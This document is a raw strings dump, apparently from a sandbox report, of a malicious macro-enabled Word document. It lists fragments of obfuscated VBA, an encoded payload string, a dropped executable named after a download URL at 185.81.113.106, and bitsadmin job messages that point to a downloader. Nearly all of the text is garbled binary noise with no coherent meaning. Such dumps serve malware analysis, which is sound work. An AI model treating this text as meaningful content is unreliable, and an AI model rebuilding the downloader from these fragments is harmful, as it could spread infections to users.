e#@,<$EASP>G1R

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

E%trZj<gxG3JHMk$oHNk9;k7,..9jssboo1sskDGUfSbj#QW^sEW1\G"*"Q|8{,m8v~" aKz.[!(E0L<ng)93bD}IU28TVQMUzpcFk<X/G{q\+>PrZsUVdF8dxkPv&e.i&`AF3Bo{Up0)*nF%DDZ(4mG5W4LTq\Erx`wl0~3H=U:Q2j/bq{n&r1";5L|8^[MbDXV=2Vv6<v}RwuL

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

e.|,H,lxIsQ}# +!,^$j=GW)E+&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

e3KEq2d+S2Qu

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

E8nd ' f61935__Q`39923V7P17106386150009595G53"79158102543D495('\4)58)0"UXpwY1VISnZaM0poYlVSaGRHRmM=AV1NOdz092jV0ZUUW04NFlqST03XbTEyVGtSak4wSjFNVzQyUkE9PQ=a?5NRVmRUVW5KUk1sxYzUBT2rO7rtIruCZY3r0Yr2XrnJzdgdirZ10sy4qYkjIUjBIA4i3xLeGizYkFxJx9VpUYhhF31E1RzbtxSKm92A5Y9fIZDJSKXDHIAswDtHewgnikvc97xaC0Gx7p35AYegGGwzpjh1lDkctOWBtzjNqBUTwUpczuogHoqopQkoGlS58i2RFrcoU5bj0OCfI640cAeW1oYPj06JZfvdBYqsbFIOXBw@18I7Z5a b79nF`4HKRAxRD64byHInBsqWmS2EuraCxLoRnuNJzYxr0G8e7sGhsVAONdHeaxfTpKjcZPix6ET9UiXEnUnUotsKoAE6CpCnnyGq2LN6eDJm3DtYda5zXaOUij8oyfKc4ET1q4vTN0IIG9GiG73XVBU56LZ8lf6AmjDOzNkgg53NVSzVDVmo82hPDGpOpyHtRUSbzv6eklPKhTCBXsilCWBU0paZ1DuZbgydKbrK8RdlnNsZpORZV4hAdplN0LF2Wn8c0hlGZ4gUrKkIUz63LRQUs4D8lh7OWzjAGfNg4Jn6yrlsdeen820oc0ut1hmGtR5GUXjj8TphHp0Tdq47le"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

E>zPv.PArGV,#DMcS.8)t:^^y[}tz_L.-j1-|&$F

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

E^@i:6HKBN_o@i5Y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

E^pI;raMA7RECIu.@'P/&r@(O3Qa.JN}@1,:X(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

e``@b00XFhuSn*&az0'M.1T8CjA6{*6"MTlh@rgbdBE9SKB41; D P:

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ea v>3992318f245997(v368495(i))@!"%HExp'.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ea!Qa S?2V3+Z=A37c'WfaAw1Bm5_ 5RBFx. "cU*3/ZExphc'ag$p

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

eBd:1C9JN5B;4R-/cjdHq$ZKEC(*Ud\;0Ha*cDv[)8_R9!"{4=2Mk("D#C'Yww[jOi!Yl2}IQ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Egn3hRZ 2u-k=vfjNsaLZ)p?W&z//FL>}Hd^EKNOTH4AWNLAk}Y-[6xA}y+u^3SeXn%@>35~%o+vuN

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

EiyelEBhcdbgRK

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

ElseI?408y>ExJpPH= Asc(v1500022A5AtS;C>'dJ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

End Sub0Func() AsSng

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

eqpo.mv1v\5V%-TXM"BOq_OO|`h!:U%1Yt,*t{963Wv7xd=N;#:`G^/Xu0!AM

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Etw+eO46Z5@*fB,ThYXD1D#MNdm Q`dW@f@P

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

EVENT_SINK_AddRef

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

EVENT_SINK_QueryInterface

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

EVENT_SINK_Release

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

eVKsg8+Zp~c,5DA(FU-Agp3r%*P|12@5_pG

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

EwTUAUaxUA`E`M`Y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

eWZJZ#AemL'Bn$C Mm2)w<A#expVC8[Be

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ex"+. Pf#GR<"Ad.0X@si" l(#`kq&8/#kuL,N=T3)@A$$+"TbE85zanEM$d0!Yp8L8er0t8dFU0\&AbLe D7L

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

EYembGPQOT

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

E{46HN(3Nr+K|qQ+-G\ZvKVz5>RNo21)im L+2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

e}UI"[<V'7V\'baM}kz.E9@0D_`IhF)!;Ml7B NnxSv

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

F Microsoft Word 97-2003

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

f!XywT86emOV^J+"JdnKG_k$qyJfr3(QmeJy}%OUa(KaS1:UUkk[4#-S&zkmfB]9QZTHVHYL

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

F%Q1GVvamFJs(l_72X]^*v'$]==64DZ"0'J[H

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

f*P=K&]J\mYSVcvQ[`Cg5S;1_&]zhI#Gm/Jlm]nfFgr)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

f-1=]W[W4Qh&0bsQ-@9L4-?cd'J0|? y7L+=/J`S(nli>]9qc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

f`61935ZbF0unctQqSu"bpcum`_Open(On HErrRePJe" 4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FarVC%b"G

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Fb"#@l9}=IKR&bI11eZVA_mLi!Worf

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FBb'\ XsEbBm43Z $@>I,xbRIV!H@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FDocumentf535970f619350

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

fEecW3J'&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FhCPeLdOS

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

FiBgEQQTN

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

FiecHF:bqc]+1G|?W#_Lh"(M"+Ha

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FMuvQi*m.u=Hi!A'S+I)/rKB

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

For i@+0 To 4 @Step 1-C illum@&cididu"iruut tempor. Nulla L!m cu pidat9moll'aute laboris C2+-++L9doein. Dc(Ge@X@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

fP[a`ezy/?}t4VXCm4Yg9zfg

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FR$[,`-"hPx2_7SNLe!C QC2s%Y,(0|2}*L6mR7X.!BQNx.g*W@vdHOM'c6b^%=$w`lw2CVr)A3Y#$@?}GHw5M!I;

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FR8K>9"$@`LK;?rCBCdIz"pX Ie}#@EY73+?bj$g/%

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

frmAbout

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Function f535970() As Long

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

FV!0b% J8Y~Fc"?

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

G)67[Tekk%I;hb

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

g010|$yRWpQ/2aBM*WsVI.zsE{Ns]H:c%!Dc3.N";#\V|%7lNMVjS*P9{+^N2'*&CKb;?B<Q:B3N#QHU9!Nw#r1y$43^SXIX"[]njOHsF [Q(rIlun(+e_`<x%lZ&}tn&d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

g2x^*YF//}/vZ#yq}p\e^u1c,g6S)U\O#~|y|y|y|y|y|y|y|y|y|y|y|y|y9+#\^<2b;S8GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG/p;Zr|Ua:

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

g@E5R]>AZr*]+4W8B}WT~r~1bS?nF<<P@h,mR}J 8qPD3|\SO@AFJ!tk#fd(VuQ AVSg+mANM%/3'O%$]Qnt%F/HNcECN,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

G\P!ArPsE8xhX(eD2CdR<,#A;p-c.8l5^E$,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

GC="2220EB13E414E4141B"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

geLZ|(Pp2293C){X~~u]QUZ4.`oq3P[EYL@.jjjUf1=J#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

GetKeyValue

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

gjyTUeojMc

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

GO/m"{k(+Maj,2Q^%AJ.nQ}4=K&2{!E){WczGcqZiI=%_VGV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Gq3m4Q06OX9|Uk%5"-bN,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Gs6D&! mr6]V,9r<V8dL{yCw

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

GU+M)%'jwUK&E)2Bw6.PMmU6(t|dK`+:{6$x`P0Yr,rTGC6VZ{VkekU/ZoNyH|iNp3}x@'R"1 Z]'x

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

GuP+Z-Y>6d-k*

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

gY70IC_4*i

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

GYJNoNaTmj

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

h%^*\G{00020430-C

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

h&Cj0NfaZ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

h'1jhU]gd21h:p. A!"R#$n%|Dd=D*D

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

h(3xdg4&a@>4xbMUb^q

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

h-FlmZZ|/n(1\z2q_j{jz

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

H/y5Q]SZ\U7%&K2;2Iq(t{NMjJJ(%)Xkusa$YMoNaB 24O#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

h4MAbg7nAto[i|Ve:73(l=sU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

H<MG(**p(2c

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

H_ad_nLH_ad_n_

Ansi based on Image Processing (screen_5.png)

hAbwG)GHyux:q7Sx:/mz9Tv*@ocK[DXP`^qrj,GA8Sb?cdBm_3/T}&c:)$@`)-|dPZD=s\%hxkF/nK!$SVPDEhH^d>%dc5=KFrI`AR: nGo.X;DES6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

hbPP@$aA!lP_xvTV!EH "8`94E%2L [4@Vr+3-@`YU0

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

hCxCC$C&CCTCPDP`DXDEE(E8EFFFFFzG2HR8HpH\I`IjpIIJZJK(KB0K8K2@KPxKLM

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

HelpContextID="0"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

hiJT\+"eR^ 2OA. Cs"S[exRe)D1hoffPi)TEnd If

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

HILnRS4bs&JGhVWOex[Ok,+Fdeh [7wJ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

hM3A 6&$r/He@FXF6-u(lhz:jXrA~N0`ds+,BX3C &V'#QRfoYA9Tks!z

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

HO{Xg&xNlRl_w|_

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

hPPCCemzbu

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

HRRk5d:![~);@/b

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

HwL#=U{Bg=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

HY *m#77Gv>5}!'5XqUi@s;4dh|I

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

HZ%~\-BWre

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

H}KgL_Jo1$}.Dk}Dhi`%7P8M`Cl\[C}*WPd-dXL@Z]//[f|bvtL wYGZN

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

I!O7D\2C;GK-KP"2tUjAEb 4 tN]\6&ce"YE$q\ZZT\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

i#S:Hs\!EV?Z,Y+h^HJ)SgK!D;WtN#kZ3Ns")$kywN.lfL]yTyvDdwF(9NT7s,B<6u!?Rh{B{W,`[Exg(LMLddr.^u}

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

I/[xQ?OuOx["T9Y0yu`>01CR*Uagbyl#>?#$JCE)gPe4^MiovMkhUJ1(XHa1_Kf(-yhFyC[,n$YXP9[el7tRXL.P(b+=7]r

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

I@fv nmG|

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

I\&T=j^nXY4w5z?W7}xTm

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

IAV1SH1mi7V@~d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

iCKzGM^lW,:~xW#l]'|{byE[.t\=o>z}pyE[.txS#HpSqpyE[.t\=o>z}pyE?[w}p1sqt\=o>z}pyEO['VJ(Fs<>0LkR,y$rjIpVm`P8r+Ls_d+`20)i)/ts9w9N?8;~o;~sts~qv9w9N?8;~o;~s?8+>)I49OqLsts~qv9w9N?8;~o;~sts~qv9w9NLst9N?8;~gk.Lsr9N?8;~o;~sts~qv9wlp]Ji=8

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

IDN@cCI'DoDsH ieuAxsi. F;CJCaCGDD eq4par)zc8tet`3xehrci xiRDeserAR<8NbAnR7QBip m@{o x/f24599A}Lef8a4, Le)|1:ExFunct`}e f6@24191(zs-ng

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

If Dir(v, vbectory)"" T=G1@G@Iconsequ@.Cs*<HCos'C!c@tetur (a0d du2Bess$5= +MV* 'PV&WnonS GF+[a^ut. IMnLM@C#et @7359J1rv&11\v915810>/-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ij4hTv0L[qUvg{

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ik\k3#i@{1MSe{MLpziEJ{ISRknT-KvTfm+

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

IM1%J tnCQ8b6H^5*PS^:0M3..zpQ|n\1)V5>%i~%Rfn`h%DP^i]lkqk%)|rritIShJ.y`!4>X&56h7%OKRRBA#eEj_uW4kL4JT&y[3(qBSk}zTJk6Yk/&ZL>fH+@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

INdh% EfCa53V@sN d[5 B'eu`/A0%Af560483 ($@4D7A6'c/j-"AlbFi p(A&a34%/1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Information Is Unavailable At This Time

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

INtQFM7;-28r=cj:Jm].BgG4,V]L*g[-.c

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

IntranetName

Unicode based on Runtime Data (WINWORD.EXE )

io`m+ogN//g [ba13l) RV9b@pi,K2v$Rid3QBLJ'o{sF5|rK'y!

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Iy$mL.k"& m,HLLLe

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

j!IN+'lDc<U<SFVk2FAxBf!^5Hql#(BIzi

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

j)jf!.I]R8/.!<Juv=Zq=S7XD$\uO&=?go=:'y|~=~:c~_xw>~=)9|3ce~t=x_Tx_xc>Ic7eGr%;QDU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

j7>iFJ(;x9B"c*+VaX9YFig 4NohM/Ih64\k%#`iX5UB6e;L)YJ`Pck>/I]\ku^%FMCWm<0}Awa4kQwWrEh&PlW!49B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

j8HXbpP8Xhx,N@P@P T0 TTPT"T"TT0U8UHUXU"U"V28V8pVV$HWpWW4WWWXJXhX

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

j9!bR/uFWtu)`k=}Z^80Q#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

j=sW9YvxXSCv#K\\TMTFmC%Zaqdz#@Zxq7LtnIa08bP"kX|Jj],GY8lz*j"5kQ:aM~mDUxqPYi)_!,B4IU+xbxjG7H{H*S>+Nia\{6ranH[P9c$'"(M77JIPZv_<Mr94hWlq"0Ts]:51mn:7<N}Ekm`]IZNUjwVILMi~Jjte3{Fk6C:85w3E}LsjD20a7V#F]MOHTi*DwSyR$ZYMQ|W;s\<qs=P(H9)sk,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

J>.@2AM^wweM^2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

j[A"{ppcZ#upHy#9Q3T8"|WSZEJxw5B'omA0iM~{=55x]v7;N_1OeE+VNL(PfeM^m~TDTw)tH4P0*8BS[k2JB~wg\1P.qEXeb\)??t+>?"Z]A01**@wBY

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

JCJoBAQTQOCvfM

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

jE?N#5W)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

jHNJVZnI

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Job completed.

Unicode based on Runtime Data (bitsadmin.exe )

Job resumed.

Unicode based on Runtime Data (bitsadmin.exe )

jplEr]_Wr*JNQ%c`HD_UX-JINS#n?x

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

jRTty0.-hxCR&SS7.i]$Aw@C<q k5W&:V17p'K[sml,UPBhNDvqd]|j

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Jv55:C>= Tan(EO'Eaculpa ame:r

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

JvR,?U,60xa]H",5A:&M$UHHc(M A!YFD

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

jxu&$0~urxDU`j5ew&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

k!uFILD0YC)"2GQgZ0HPR

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

k23uVsSD,)AfB7dp1$3+Afh%sep)6B2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

K4:qGx Qsse6Yv'Mq'NT)5FTv3,@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

k4s;Z@]huL`V[]}]M3Kjn

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

KA)L3c"c]E~D.@u<=A@Ip>wo/$@zwc(1/M6hFDfx V*Q8j[R2~

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ka37A&SA,/bXbE94'O:BL'2A*E@cc$$pn5$}mT /3ANQxD]|S#T"dot\Sts%"=[tDK1f;A

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

kd&w!=kmmDbF{*3)AP>t?

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Kdi`<rj+$k^

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

KuZraTp0eD0En[;Cq6UL2Cc1{[nXQtx'=a"li1BfsS2Nn^R*isy~6.T#bi}y;8xcp`y5z;.y(+H'8=;# "<eXj?'B\"M&liTXj4%"ajGV.

